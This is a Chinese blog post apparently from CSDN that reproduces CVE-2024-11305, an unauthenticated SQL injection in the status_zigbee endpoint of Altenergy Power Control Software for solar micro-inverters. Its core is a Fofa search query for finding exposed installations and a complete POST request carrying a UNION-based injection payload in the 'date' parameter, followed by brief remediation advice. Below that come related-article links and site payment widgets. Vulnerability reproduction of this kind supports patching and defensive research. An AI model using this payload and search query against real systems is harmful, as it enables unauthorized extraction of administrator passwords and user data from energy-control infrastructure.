Altenergy电力系统 status_zigbee SQL注入漏洞复现(CVE-2024-11305)

于 2024-11-18 21:45:30 发布
阅读量201 收藏 2
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/143867459
版权

0x01 产品描述:

              Altenergy‌是一家专注于微型逆变器控制软件的公司,Altenergy电力系统控制软件是Altenergy电力系统公司的一款微型逆变器控制软件。

0x02 漏洞描述:

             Altenergy电力系统 status_zigbee接口处存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。

 

0x03 搜索语句:

Fofa:title="Altenergy Power Control Software"

0x04 漏洞复现:

POST /index.php/display/status_zigbee HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close

date=2024-11-06%' UNION ALL SELECT 11,CHAR(112)||CHAR(77,121,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,119,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,112),12-- eKdp

0x05 修复建议:

        建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。

iSee857
关注
Altenergy电力系统控制软件 RCE漏洞复现(CVE-2023-28343)
0xSec
12-08 1023
Altenergy Power System Control Software C1.2.5版本存在安全漏洞,该系统/set_timezone存在操作系统命令注入漏洞,攻击者可执行任意命令获取服务器权限。
Altenergy电力系统控制软件 status_zigbee SQL注入漏洞复现(CVE-2024-11305)
最新发布
0xSec
11-18 186
Altenergy 电力系统控制软件中发现了一个被归类为严重漏洞。此漏洞影响文件 /index.php/display/status_zigbee 的 get_status_zigbee 函数。使用未知输入操纵参数 date 会导致 sql 注入漏洞
Goby漏洞更新 | Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
m0_46699477的博客
03-21 707
Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
2024HW漏洞总结500+个漏洞|威胁情报第|HW情报
weixin_43167326的博客
09-02 3476
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
2021-2025年中国微型逆变器行业市场供需与战略研究报告
贝哲斯数据中心
09-02 192
微型逆变器,或简称微型逆变器,是一种用于光伏发电的即插即用装置,它将单个太阳能模块产生的直流电(DC)转换为交流电(AC)。几个微型逆变器的输出可以组合起来,并经常馈送到电网。 微型逆变器市场的企业竞争态势 该报告涉及的主要国际市场参与者有AEconversion、Chilicon Power、Enluxsolar、Involar、ReneSola、Saronic (EU) Power Tech、Altenergy Power System、Darfon Electronics、Enphase...
Tigo与APsystems签署许可协议,并撤回专利侵权诉讼
美国商业资讯的博客
05-06 295
和解行动确认Tigo的知识产权,使客户在市场上更坚定地选择Tigo 加州坎贝尔--(美国商业资讯)--太阳能行业柔性组件级电力电子(Flex-MLPE)领域全球领军企业TigoEnergy, Inc.宣布,公司已与Altenergy Power Systems(简称“APsystems”)就APsystems侵犯Tigo知识产权的诉讼达成和解。作为和解协议的一部分,APsystems获得了使用Tigo快速关断技术的许可。 Tigo董事长兼首席执行官Zvi Alon表示:“双方最终达成和解,我..
C语言编程规范 [注释]
weixin_30877755的博客
07-15 155
规则: 1:一般情况下,源程序有效注释量必须在20%以上。说明:注释的原则是有助于对程序的阅读理解,在该加的地方都加了,注释不宜太多也不能太少,注释语言必须准确、易懂、简洁。 2:说明性文件(如头文件.h文件、.inc文件、.def文件、编译说明文件.cfg等)头部应进行注释,注释必须列出:版权说明、版本号、生成日期、作者、内容、功能、与其它文件的关系、修改日志等,头文件的注释中还应有函数功能...
Tigo对APS提起新的知识产权侵权诉讼
美国商业资讯的博客
04-16 291
本次针对APSystems及其母公司浙江昱能科技有限公司的诉讼涉及五项专利 加州坎贝尔--(美国商业资讯)--太阳能行业柔性组件级电力电子(Flex-MLPE)领域全球领军企业Tigo Energy, Inc.对Altenergy Power Systems(简称“APsystems”)提起新的诉讼,而此前所提起的诉讼仍在进行当中。起诉书内容包含四项新的专利侵权要求,以及之前诉讼中所主张的一项专利侵权的附加要求。起诉书已提交给美国加州北区地方法院。目前,两起诉讼案的在诉专利总数已达六项。起诉对象包括.
altenergy engery powers up
11-16
altenergy engery powers up英语论文,介绍现代新能源(主要是风能)的全球前景
蓝队基础1 -- 企业信息架构与安全基础
CrossProblems的博客
11-14 1386
在这新兴的“模糊边界”环境下,企业必须确保系统的安全性和一致性,平衡内部IT架构与外部服务的整合,才能在云时代有效地管理资源并推动业务的敏捷发展。负责企业内的技术支持,包括工作站、笔记本电脑的维护以及服务台的支持,确保员工能顺畅使用设备。ISM3通过分级的成熟度等级,帮助企业评估安全管理流程的效率和规范性,指出改进路径。通常为物理隔离并具有冗余设计的区域,核心网络支持企业的主要通信,保障网络的高可用性。通过合理划分企业网络区域,企业不仅能提高整体安全性,还能确保网络的灵活管理与稳定性。
web3+web2安全/前端/钱包/合约测试思路——尝试前端绕过直接上链寻找漏洞
2401_83799022的博客
11-14 664
DEFI APP会存在许多的前端限制,原因是一些项目常常会有多种多样的限制,然而DEFI APP有别于传统的JAVA后端语言,DAPP有自己独属于区块链特性,能够直接交互上链且上链后不可篡改特征也让DAPP上线前往往更加严格,在前端的限制有可能只是为了掩盖该项目合约的问题(项目合约可编译不公开代码,可进行白名单KYC认证)发现这个值的触发来源于如下,也就是说进入了以下方法后,通过switch来判断,最终达到case为15的时候,就会进入判断,那么我们只需在断点时候不要让他进入这个判断。
JWT深度解析:Java Web中的安全传输与身份验证
2401_85760095的博客
11-14 610
JSON Web Token(JWT)是一种轻量级的身份验证和授权标准,它允许在各方之间安全地传输信息。JWT作为一种安全传输信息和身份验证的解决方案,在Java Web开发中扮演着重要角色。它通过紧凑、自包含的方式传输用户信息,同时支持无状态和跨域认证,使得JWT成为现代Web应用中不可或缺的一部分。JWT是一种紧凑的、URL安全的令牌,用于在各方之间安全地传输信息。JWT的结构允许其轻松地在不同的系统之间传输,并且能被携带在URL的参数中,同时也支持在POST请求体中作为表单数据发送。
安全见闻8
2401_86628519的博客
11-13 1411
声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章声明:本文主要用作技术分享,所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险,并遵循相关法律法规。
安全见闻1-5
XLbb的博客
11-14 904
涵盖了编程语言、软件程序类型、操作系统、网络通讯、硬件设备、web前后端、脚本语言、病毒种类、服务器程序、人工智能等基本知识,有助于全面了解计算机科学和网络技术的各个方面。
建筑施工特种作业人员安全生产知识试题
m0_66937659的博客
11-13 470
未发生死亡事故的,安全生产许可证有效期满时,经原安全生产许可证颁发管理机关同意,不再审查,安全生产许可证有效期延期()颁布实施,标志着安全生产成为我国现阶段建筑业工作的重点,安全生产制度被确立为促进我国建筑业发展的一项根本制度。11.根据《建设工程安全生产管理条例》,作业人员进入新的岗位或者新的施工现场前,应当接受()是安全生产领域的综合性基本法,是我国第一部全面规范安全生产的专门法律。)《中华人民共和国安全生产法》,制定《建设工程安全生产条例》。3.《中华人民共和国安全生产法》规定生产经营单位必须为(
内网安全、域渗透测试工具-NetExec介绍及使用(优秀)
墨痕诉清风的博客
11-14 382
NeNetExec (nxc) 是一款功能强大的自动化网络安全评估与漏洞测试工具,是 CrackMapExec-已停止维护 (CME) 的现代继任者,现已被渗透测试人员和红队成员广泛使用,可被用于多种协议下的渗透测试中。
康谋分享 | 确保AD/ADAS系统的安全:避免数据泛滥的关键
hongkeaimotek的博客
11-13 1008
如何实现数据的高效管理、解读和正确分析,以避免数据泛滥的不利影响?掌握好“指标与算法”和“全面可视化分析工具”两大关键要素,助力AD/ADAS系统开发、验证和改进过程!
【VLANPWN】一款针对VLAN的安全研究和渗透测试工具
2401_84466225的博客
11-13 1756
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。的安全研究和渗透测试工具,该工具可以帮助广大研究人员通过对VLAN执行渗透测试,来研究和分析目标VLAN的安全状况。:该脚本用于执行一次DTP交换机欺骗/劫持攻击,该脚本将发送一个恶意的DTP帧,此时会将测试人员的设备变成主干信道。:该脚本旨在执行一次VLAN Hopping攻击(跳跃攻击),该脚本将注入一个包含两个802.1Q标签的帧,并发送测试目的的ICMAP请求。VLANPWN是一款针对。
java组件安全
weixin_67289581的博客
11-13 896
默认端口:8983。
【魔珐有言-注册/登录安全分析报告-无验证方式导致安全隐患】
11-14 697
有言是一款原生3D内容AIGC产品。可以实现3D视频,一键生成。用有言创作视频,无需拍摄,无需真人出镜,上千个高质量超写实3D数字人角色库可供选择。有言是一款原生AIGC产品。通过魔珐自研的AIGC全栈技术能力,即AIGC三维动画、 AIGC三维超写实形象、AIGC三维运镜、AIGC声音,有言能够一键生成:场景、运镜、动画、声音,从拍摄到剪辑,AIGC everything。有言简单易用,仅需通过生成内容、编辑镜头、视频包装三步操作,即可打造一个高质量的3D视频。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值